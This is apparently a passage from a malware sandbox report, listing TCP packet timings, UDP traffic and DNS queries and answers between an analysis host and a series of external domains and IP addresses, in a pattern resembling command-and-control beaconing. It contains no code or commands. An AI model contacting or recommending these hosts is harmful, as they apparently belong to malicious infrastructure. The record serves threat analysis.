                                                                            Nov 24, 2024 08:23:27.831362009 CET5000580192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:27.841658115 CET5000580192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:27.961339951 CET805000546.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:41.778299093 CET805000246.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:41.778548956 CET5000280192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:44.394747019 CET805000346.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:44.394810915 CET5000380192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:47.106734037 CET805000446.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:47.106842041 CET5000480192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:49.747652054 CET805000546.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:49.750490904 CET5000580192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:49.754412889 CET5000580192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:49.873886108 CET805000546.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:55.245023966 CET5000680192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:55.364667892 CET8050006107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:55.364769936 CET5000680192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:55.380878925 CET5000680192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:55.500485897 CET8050006107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:56.661752939 CET8050006107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:56.661817074 CET8050006107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:56.661830902 CET8050006107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:56.661866903 CET5000680192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:56.894664049 CET5000680192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:57.914463997 CET5000780192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:58.034117937 CET8050007107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:58.034605026 CET5000780192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:58.050436974 CET5000780192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:58.169938087 CET8050007107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:59.292924881 CET8050007107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:59.292967081 CET8050007107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:59.292980909 CET8050007107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:23:59.293030024 CET5000780192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:59.293030024 CET5000780192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:23:59.550802946 CET5000780192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:00.570370913 CET5000880192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:00.689975977 CET8050008107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:00.690083981 CET5000880192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:00.710191965 CET5000880192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:00.829956055 CET8050008107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:00.829977989 CET8050008107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:01.939541101 CET8050008107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:01.939558983 CET8050008107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:01.939567089 CET8050008107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:01.939770937 CET5000880192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:02.222731113 CET5000880192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:03.244257927 CET5000980192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:03.363965988 CET8050009107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:03.364084005 CET5000980192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:03.379560947 CET5000980192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:03.499176025 CET8050009107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:04.614799023 CET8050009107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:04.614813089 CET8050009107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:04.614821911 CET8050009107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:04.614948034 CET5000980192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:04.614988089 CET5000980192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:04.618844032 CET5000980192.168.2.10107.167.84.42
                                                                            Nov 24, 2024 08:24:04.738341093 CET8050009107.167.84.42192.168.2.10
                                                                            Nov 24, 2024 08:24:10.242985964 CET5001080192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:10.363399029 CET8050010209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:10.363521099 CET5001080192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:10.379699945 CET5001080192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:10.499355078 CET8050010209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:11.589339018 CET8050010209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:11.589374065 CET8050010209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:11.589441061 CET5001080192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:11.894841909 CET5001080192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:12.914458990 CET5001180192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:13.034154892 CET8050011209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:13.034240961 CET5001180192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:13.058130026 CET5001180192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:13.177869081 CET8050011209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:14.316293001 CET8050011209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:14.316515923 CET8050011209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:14.320981026 CET5001180192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:14.566497087 CET5001180192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:15.585305929 CET5001280192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:15.705096960 CET8050012209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:15.708867073 CET5001280192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:15.723871946 CET5001280192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:15.843722105 CET8050012209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:15.843791962 CET8050012209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:16.977004051 CET8050012209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:16.977024078 CET8050012209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:16.977102995 CET5001280192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:17.238406897 CET5001280192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:18.257114887 CET5001380192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:18.376674891 CET8050013209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:18.378683090 CET5001380192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:18.390542030 CET5001380192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:18.510090113 CET8050013209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:19.666932106 CET8050013209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:19.666974068 CET8050013209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:19.667228937 CET5001380192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:19.670013905 CET5001380192.168.2.10209.74.77.109
                                                                            Nov 24, 2024 08:24:19.789633989 CET8050013209.74.77.109192.168.2.10
                                                                            Nov 24, 2024 08:24:25.393040895 CET5001480192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:25.512542963 CET8050014199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:25.514720917 CET5001480192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:25.535521984 CET5001480192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:25.655512094 CET8050014199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:26.656820059 CET8050014199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:26.656852007 CET8050014199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:26.656867981 CET8050014199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:26.656912088 CET5001480192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:26.656950951 CET5001480192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:27.051198006 CET5001480192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:28.070601940 CET5001580192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:28.190052986 CET8050015199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:28.190203905 CET5001580192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:28.206604958 CET5001580192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:28.326853037 CET8050015199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:29.332048893 CET8050015199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:29.332076073 CET8050015199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:29.332156897 CET8050015199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:29.332179070 CET5001580192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:29.332217932 CET5001580192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:29.707737923 CET5001580192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:30.726656914 CET5001680192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:30.846307039 CET8050016199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:30.846389055 CET5001680192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:30.868143082 CET5001680192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:30.987824917 CET8050016199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:30.987855911 CET8050016199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:31.942544937 CET8050016199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:31.942559004 CET8050016199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:31.942573071 CET8050016199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:31.942671061 CET5001680192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:32.379321098 CET5001680192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:33.423548937 CET5001780192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:33.543401957 CET8050017199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:33.543544054 CET5001780192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:33.553937912 CET5001780192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:33.673512936 CET8050017199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:34.684895039 CET8050017199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:34.685058117 CET8050017199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:34.685225964 CET8050017199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:34.685231924 CET5001780192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:34.685296059 CET5001780192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:34.688245058 CET5001780192.168.2.10199.59.243.227
                                                                            Nov 24, 2024 08:24:34.807884932 CET8050017199.59.243.227192.168.2.10
                                                                            Nov 24, 2024 08:24:40.286710978 CET5001880192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:40.406433105 CET805001874.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:40.406914949 CET5001880192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:40.421927929 CET5001880192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:40.541769981 CET805001874.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:41.560266972 CET805001874.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:41.560403109 CET805001874.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:41.562922001 CET5001880192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:41.926035881 CET5001880192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:42.947983980 CET5001980192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:43.223329067 CET805001974.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:43.223632097 CET5001980192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:43.304617882 CET5001980192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:43.424215078 CET805001974.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:44.480386019 CET805001974.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:44.480535984 CET805001974.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:44.480618954 CET5001980192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:44.816813946 CET5001980192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:46.085982084 CET5002080192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:46.205832958 CET805002074.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:46.206196070 CET5002080192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:46.226701021 CET5002080192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:46.346448898 CET805002074.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:46.346458912 CET805002074.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:47.407911062 CET805002074.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:47.408183098 CET805002074.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:47.408255100 CET5002080192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:47.738825083 CET5002080192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:48.757493973 CET5002180192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:48.877027988 CET805002174.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:48.877120972 CET5002180192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:48.889106989 CET5002180192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:49.008588076 CET805002174.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:50.032517910 CET805002174.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:50.033324957 CET805002174.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:50.033643007 CET5002180192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:50.038726091 CET5002180192.168.2.1074.208.236.156
                                                                            Nov 24, 2024 08:24:50.158209085 CET805002174.208.236.156192.168.2.10
                                                                            Nov 24, 2024 08:24:55.801016092 CET5002280192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:24:55.920666933 CET805002268.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:24:55.922893047 CET5002280192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:24:55.938232899 CET5002280192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:24:56.058042049 CET805002268.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:24:57.221766949 CET805002268.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:24:57.221831083 CET805002268.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:24:57.221884012 CET5002280192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:24:57.442958117 CET5002280192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:24:58.462776899 CET5002380192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:24:58.582360029 CET805002368.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:24:58.582484007 CET5002380192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:24:58.610086918 CET5002380192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:24:58.729650021 CET805002368.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:24:59.880987883 CET805002368.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:24:59.881669998 CET805002368.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:24:59.881848097 CET5002380192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:00.113790035 CET5002380192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:01.133251905 CET5002480192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:01.253079891 CET805002468.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:01.253182888 CET5002480192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:01.271647930 CET5002480192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:01.391330957 CET805002468.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:01.391393900 CET805002468.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:02.505578041 CET805002468.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:02.505628109 CET805002468.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:02.505834103 CET5002480192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:02.785653114 CET5002480192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:03.804527044 CET5002580192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:03.924237967 CET805002568.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:03.925085068 CET5002580192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:03.934626102 CET5002580192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:04.054450989 CET805002568.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:05.179421902 CET805002568.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:05.179449081 CET805002568.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:05.179600000 CET5002580192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:05.182806969 CET5002580192.168.2.1068.66.226.92
                                                                            Nov 24, 2024 08:25:05.302320957 CET805002568.66.226.92192.168.2.10
                                                                            Nov 24, 2024 08:25:10.599973917 CET5002680192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:10.719609022 CET8050026172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:10.719711065 CET5002680192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:10.737601042 CET5002680192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:10.857220888 CET8050026172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:11.992429972 CET8050026172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:11.992938042 CET8050026172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:11.993303061 CET5002680192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:12.254877090 CET5002680192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:13.274204016 CET5002780192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:13.393827915 CET8050027172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:13.393934965 CET5002780192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:13.410346985 CET5002780192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:13.530159950 CET8050027172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:14.748753071 CET8050027172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:14.749818087 CET8050027172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:14.749888897 CET5002780192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:14.938570023 CET5002780192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:15.967309952 CET5002880192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:16.086987019 CET8050028172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:16.087165117 CET5002880192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:16.102524996 CET5002880192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:16.222135067 CET8050028172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:16.222254038 CET8050028172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:17.469991922 CET8050028172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:17.470658064 CET8050028172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:17.470725060 CET5002880192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:17.613792896 CET5002880192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:18.633196115 CET5002980192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:18.753397942 CET8050029172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:18.753603935 CET5002980192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:19.649274111 CET5002980192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:19.768960953 CET8050029172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:20.158279896 CET8050029172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:20.159370899 CET8050029172.67.186.192192.168.2.10
                                                                            Nov 24, 2024 08:25:20.159713984 CET5002980192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:20.161283016 CET5002980192.168.2.10172.67.186.192
                                                                            Nov 24, 2024 08:25:20.280802011 CET8050029172.67.186.192192.168.2.10

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 24, 2024 08:21:46.691528082 CET6155453192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:21:46.829744101 CET53615541.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:22:03.231898069 CET4925653192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:22:04.020790100 CET53492561.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:22:18.335464001 CET6224953192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:22:19.172167063 CET53622491.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:22:33.914105892 CET4970053192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:22:34.640965939 CET53497001.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:22:49.340059996 CET4990853192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:22:49.986017942 CET53499081.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:23:04.530169964 CET6450053192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:23:04.926156998 CET53645001.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:23:19.362548113 CET6236353192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:23:19.694448948 CET53623631.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:23:54.759618998 CET6065453192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:23:55.242022038 CET53606541.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:24:09.632787943 CET6034453192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:24:10.239234924 CET53603441.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:24:24.681654930 CET5804953192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:24:25.389416933 CET53580491.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:24:39.696706057 CET6094353192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:24:40.281846046 CET53609431.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:24:55.055237055 CET6178853192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:24:55.797934055 CET53617881.1.1.1192.168.2.10
                                                                            Nov 24, 2024 08:25:10.195902109 CET5087953192.168.2.101.1.1.1
                                                                            Nov 24, 2024 08:25:10.595948935 CET53508791.1.1.1192.168.2.10

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Nov 24, 2024 08:21:46.691528082 CET192.168.2.101.1.1.10x453bStandard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:03.231898069 CET192.168.2.101.1.1.10xb50Standard query (0)www.bookingservice.centerA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:18.335464001 CET192.168.2.101.1.1.10xb25Standard query (0)www.tempatmudisini06.clickA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:33.914105892 CET192.168.2.101.1.1.10x8db2Standard query (0)www.hm35s.topA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:49.340059996 CET192.168.2.101.1.1.10xff53Standard query (0)www.snehasfashion.shopA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:23:04.530169964 CET192.168.2.101.1.1.10x5be8Standard query (0)www.sitioseguro.blogA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:23:19.362548113 CET192.168.2.101.1.1.10x787bStandard query (0)www.windsky.clickA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:23:54.759618998 CET192.168.2.101.1.1.10xb894Standard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:24:09.632787943 CET192.168.2.101.1.1.10xbf2bStandard query (0)www.moviebuff.infoA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:24:24.681654930 CET192.168.2.101.1.1.10x6347Standard query (0)www.whisperart.netA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:24:39.696706057 CET192.168.2.101.1.1.10x8f88Standard query (0)www.christinascuties.netA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:24:55.055237055 CET192.168.2.101.1.1.10x9288Standard query (0)www.717hy.netA (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:25:10.195902109 CET192.168.2.101.1.1.10xdf5fStandard query (0)www.izmirescortg.xyzA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 24, 2024 08:21:46.829744101 CET1.1.1.1192.168.2.100x453bNo error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 24, 2024 08:21:46.829744101 CET1.1.1.1192.168.2.100x453bNo error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:04.020790100 CET1.1.1.1192.168.2.100xb50No error (0)www.bookingservice.center98.124.224.17A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:19.172167063 CET1.1.1.1192.168.2.100xb25No error (0)www.tempatmudisini06.clicktempatmudisini06.clickCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:19.172167063 CET1.1.1.1192.168.2.100xb25No error (0)tempatmudisini06.click103.21.221.4A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:34.640965939 CET1.1.1.1192.168.2.100x8db2No error (0)www.hm35s.tophm35s.topCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:34.640965939 CET1.1.1.1192.168.2.100x8db2No error (0)hm35s.top154.23.184.95A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:49.986017942 CET1.1.1.1192.168.2.100xff53No error (0)www.snehasfashion.shopsnehasfashion.shopCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 24, 2024 08:22:49.986017942 CET1.1.1.1192.168.2.100xff53No error (0)snehasfashion.shop88.198.8.150A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:23:04.926156998 CET1.1.1.1192.168.2.100x5be8No error (0)www.sitioseguro.blog172.67.162.39A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:23:04.926156998 CET1.1.1.1192.168.2.100x5be8No error (0)www.sitioseguro.blog104.21.15.100A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:23:19.694448948 CET1.1.1.1192.168.2.100x787bNo error (0)www.windsky.click46.253.5.221A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:23:55.242022038 CET1.1.1.1192.168.2.100xb894No error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 24, 2024 08:23:55.242022038 CET1.1.1.1192.168.2.100xb894No error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:24:10.239234924 CET1.1.1.1192.168.2.100xbf2bNo error (0)www.moviebuff.info209.74.77.109A (IP address)IN (0x0001)false
